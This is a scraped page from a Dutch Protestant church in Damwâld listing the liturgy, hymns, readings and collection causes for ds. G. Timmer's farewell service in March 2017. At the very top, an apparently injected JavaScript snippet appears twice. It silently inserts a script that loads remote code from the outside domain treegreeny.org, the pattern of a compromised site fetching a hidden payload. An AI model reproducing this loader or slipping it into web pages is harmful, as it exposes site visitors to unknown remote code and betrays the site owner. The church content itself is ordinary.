;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Afscheidsdienst ds. G. Timmer - PKN Damwâld
zondag 26 maart 2017
09:30 uur

Afscheidsdienst ds. G. Timmer

Thema: “De tijd is verzet”

Informatie

Voorganger:Ds. G. Timmer
Organist:Jaap van der Horn
Thema:“De tijd is verzet”
Liturgie
lied voor de dienst Gezang 173: 1, 2 en 3
Welkom en mededelingen
intochtslied : Psalm 150: 1 en 2
Stil gebed, bemoediging en groet .
We zingen: Psalm 103: 1, 2 en 5
Wetlezing
We zingen: Gezang 182: 1, 3 en 6
Gebed om de opening van het Woord .
We lezen: Hebreeën 4: 14 t/m 5: 10
We zingen: ELB 299: 1, 2, en 3
Verkondiging : “De tijd is verzet”
We zingen: ELB 348: 1, 3 en 5
Toespraken
Dankgebed en voorbeden .
Collecte
Slotlied ELB 501: 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Steun mensen in de knel

40 Dagentijd: Steun mensen in de knel
Mensen in de knel, zoals verslaafden, mensen zonder papieren en daklozen, kunnen voor tijdelijke opvang terecht in diaconaal centrum de Pauluskerk in Rotterdam. Daar kunnen zij elkaar ontmoeten, aanschuiven voor een maaltijd, gebruikmaken van het spreekuur van een maatschappelijk werker, arts of predikant of gewoon een kop koffie drinken. Ook mensen die niet in de knel zitten, zijn van harte welkom in de Pauluskerk. Daarnaast organiseert de Pauluskerk regelmatig leeravonden en debatten op het snijvlak van geloof, kerk, cultuur en samenleving. Op die manier biedt zij een breed programma dat mensen in uiteenlopende situaties ondersteunt.Voor 7 euro kan één persoon een week lang aanschuiven voor een maaltijd in de Pauluskerk. Uw gift maakt het mogelijk dat er een plek is voor mensen in de knel waar zij onderdak hebben, elkaar kunnen ontmoeten en samen kunnen eten. Doet u ook mee?

Tweede collecte: Kerk
Uitganscollecte: Kerk